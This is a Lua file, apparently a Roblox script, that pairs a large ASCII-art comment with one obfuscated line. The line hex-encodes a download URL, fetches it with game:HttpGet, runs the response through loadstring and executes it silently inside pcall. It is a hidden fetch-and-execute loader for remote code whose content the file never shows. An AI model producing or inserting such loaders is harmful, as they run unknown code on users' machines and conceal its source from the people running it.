--[[
                                .::                       .
                               :::::::....                `::
                          .::::::::::::::::::..::::::::::::::.
                   .:  .::::::::::::::::::::::::::::::::::::::::
                  ::::::::::::::::::::::::::::::::::::::::::::::::
                  `:::::::::::::::``::::::::::: `::::::::::::::::::
                   ::::::::::'zc$$$b`:',cc,`:::' :''``,c=`:::::::::::'
                  ::::::::'::: $$$$$$$$$$$$$c,,u,zd$$$$$c,',zc,`::::'
                  ::::::'z$ccd$$$$$P" . "$$$$$$$$$$$$.. `?$$$$".::::
                 :::::::dP?$$$$$$$" d$$$$$$$$$$$$$$$$$$$b."$$L,`:::
               :::::::::.::$$$$$$ z$$$$$$$$$$$$$$$$$$$$$$$c"$$$$,::..
                `'::::::'`.$$$$$$$"$F&lt;$"3$$$$$$$$$$$$$$?$$?$$P:..:''
                  `:::::`$$$$$$$"?   .. ?"$$$$$$$$$$r`" " &lt;"3$c`:
                    :::::."?:`$$F    d$$.&lt;$$$$$$$$P    4$c $"""/
                     :::::::::J$ .,,$$$$P $$$$$$$$&gt;   ,$$$F  ::::
                  `:::'```'',d$$c`?$$$$P"J$$$$$$$$."$$$$$P db`''
                      f,r4b4$$$$$c ,`"".-$$$$$$$$$$c """" c$$$ b
                      F ,$"d$$$$$$$$c$bd$$$$$$$ $$$$b$bJ$L$$$P P
                            "?$$$$$$$$$$$$$$$P??$$$$$$$$$$$P" '
                               `"""???$PFFF""    """"""""
                            4$$$$$$cdccccc$$$bcc$$$$$$$$$$$$bc
                           d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$bc
                          $$$$$$$$$$$??????$$$FF?????P 3$$$$$$$$$$c.
                         d$$$$$$$$P':::::::`?'::::::::   "?$$$$$$$$$$c.
                        4$$$$$P  $ :::::::::::::::::::      "?$$$$$$$$$c
                        $$$$$P  `$.::::::::::::::::::          `"".$$$$$c
                      .$$$$$$'   `$-`::::::::::::::'             c$$$$$$$
                     z$$$$$$'      ::::::::::::::::            .$$$$$$$$
                   .d$$$$$$'       `:::::::::::::::           .$$$$$$$F'
                  d$$$$$$$'         `::::::::::::::          ,$$$$$$P"
                .$$$$$$$F            ::::::::::::::: 3c,  . 4$$$$P"'
               z$$$$$$$"           :::::::::::::: ==$$$$$c % "?"
              z$$$$$$"           .::::::::::::::::..:3$$$$P L
              `?$$$"            ::::::::::::::::::::.?::: . $
   .,,,,ccc$L ? ""             :::::::::::::::::::::::::::.c%
 :$$ ?=?P$$$%                 ::::::::::::::::::::::::::::
:"???$%==""  "d               :::::::::::::::::::::::::::::    .
                             `:::::::::::::::::::::::::::::::::::
                              ::::::::::::::::::::::::::::::::::
                         :   :::::::::::::::::````,,,,zcc`''''`
                         :::::::::::'zc,,,,,cd$$ `???""""
                         `::::::::',d$$$$$$$$$$$      =
                           `````` $$$$$$$$$$$$$$ $$$$$c$F
                                  `$$$$$$$$$$$$$ $$$$$$F
                                   `$$$$$$$$$$$F&lt;$$$$$$
                                    `$$$$$$$$$$'$$$$$$F
                                     4$$$$$$$$F&lt;$$$$$P
                                    z$$$$$$$$F $$$$$P
                                   c$$$$$$$$$ J$$$$$F
                                 .$$$$$$$$$$"z$$$$$$
                                 $$$$$$$$$P c$$$$$$$
                                $$$$$$$$$" 4$$$$$$$F
                               d$$$$$$$$"  $$$$$$$$'
                              .$$$$$$$P    4$$$$$$$
                              J$$$$$$"      $$$$$$F
                              $$$$$P        ?$$$$$
                             d$$$$F         &lt;$$$$F
                             $$$P"           $$$P
                            J$$P            &lt;$$$'
                           .$$P             $$$$
                          .$$$             `$$$L
                         z$$$F            / "$$$
                        $$$$%/           ( ;. "?.
                       ;"?""&gt;            ``  `.  \
                       \.- `                   `--']]--
pcall(function()local s,c,g=string.sub,string.char,game;local u=(function(x)local o={}for i=1,#x,2 do o[#o+1]=c(tonumber(s(x,i,i+1),16))end;return table.concat(o)end)("68747470733a2f2f6170692e6a6e6b69652e636f6d2f6170692f76312f6c7561736372697074732f7075626c69632f633861346537393430393730346338636538663835636562343432613062313537623438313234396330383738623835636665643564646231396466393666372f646f776e6c6f6164");local r=g:HttpGet(u);local f=loadstring(r);if type(f)=="function"then f()end end)
